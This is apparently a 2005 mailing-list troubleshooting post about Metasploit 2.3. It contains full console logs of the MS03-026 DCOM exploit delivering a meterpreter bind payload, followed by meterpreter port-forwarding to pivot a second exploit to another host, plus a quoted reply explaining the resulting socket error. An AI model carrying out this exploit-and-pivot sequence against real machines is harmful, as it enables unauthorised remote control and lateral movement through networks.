use of meterpreter (copy for the list )

[thomas.werth at vahle.de (Thomas Werth)]

i just rechecked vulnerability of host to be sure not to have an
invulnerable host.
So i'm using now former proxy host as target host and a new vulnerable
host as proxy host. Now i get an error 11001.
here's the log


                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]


msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.185
RHOST -> 10.10.10.185
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default         Description
  --------    ------    ------------    ------------------
  required    RHOST     10.10.10.185    The target address
  required    RPORT     135             The target port

  Payload:    Name        Default
 Descrip
tion
  --------    --------    -------------------------------------------
 -------
-----------------------------------
  required    EXITFUNC    thread
 Exit te
chnique: "process", "thread", "seh"
  required    METDLL      /home/framework/data/meterpreter/metsrv.dll
 The ful
l path the meterpreter server dll
  required    LPORT       4444
 Listeni
ng port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x92ca
[*] Got connection from 10.10.10.56:1156 <-> 10.10.10.185:4444
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -=    connected to    =- ]
[ -= meterpreter server =- ]
[ -=    v.  00000500    =- ]
meterpreter> use -m Net
loadlib: Loading library from 'ext699020.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 10.10.10.88 -p 135
portfwd: Successfully created local listener on port 9000.
meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.88 -p 4444
portfwd: Successfully created local listener on port 4444.
meterpreter> portfwd -v
Local port forward listeners:

  127.0.0.1:9000 <-> 10.10.10.88:135
  127.0.0.1:4444 <-> 10.10.10.88:4444
meterpreter>
open_tcp_channel: failure, 11001.
meterpreter>
------------
second shell :
--------------


                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888


+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 9000
RPORT -> 9000
msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default      Description
  --------    ------    ---------    ------------------
  required    RHOST     127.0.0.1    The target address
  required    RPORT     9000         The target port

  Payload:    Name        Default    Description
  --------    --------    -------
------------------------------------------

  required    EXITFUNC    thread     Exit technique: "process",
"thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Got connection from 127.0.0.1:1221 <-> 127.0.0.1:4444

[*] Exiting Bind Handler.

msf msrpc_dcom_ms03_026(win32_bind) >

mmiller at hick.org schrieb:
> On Mon, Apr 18, 2005 at 10:07:48AM +0200, Thomas Werth wrote:
>
> > > Does the bind handler ever say it established the connection?  Does it
> > > say this before or after the 'Connected to REMACT'?  If it says that the
> > > bind handler has established the connection before the 'REMACT' line
> > > then you may have created the port forward too soon.  Can you include
> > > the full output from the exploit command?
> >
> > bind handler doesn't say it establishes a connection. Just saw that on
> > meterpreter window an error is thrown up open_tcp_channel: failure, 10061.
>
>
> The above error code indicates why it's not working.  10061 is
> WSACONNREFUSED.  This means that when the meterpreter server instance
> attempted to connect to 10.10.10.77 on port 135 (or 4444 depending on
> the stage), the connection was refused.  This is probably indicative of
> the fact that the exploit did not work against the machine that you are
> attempting to target.  Are you certain that it's vulnerable?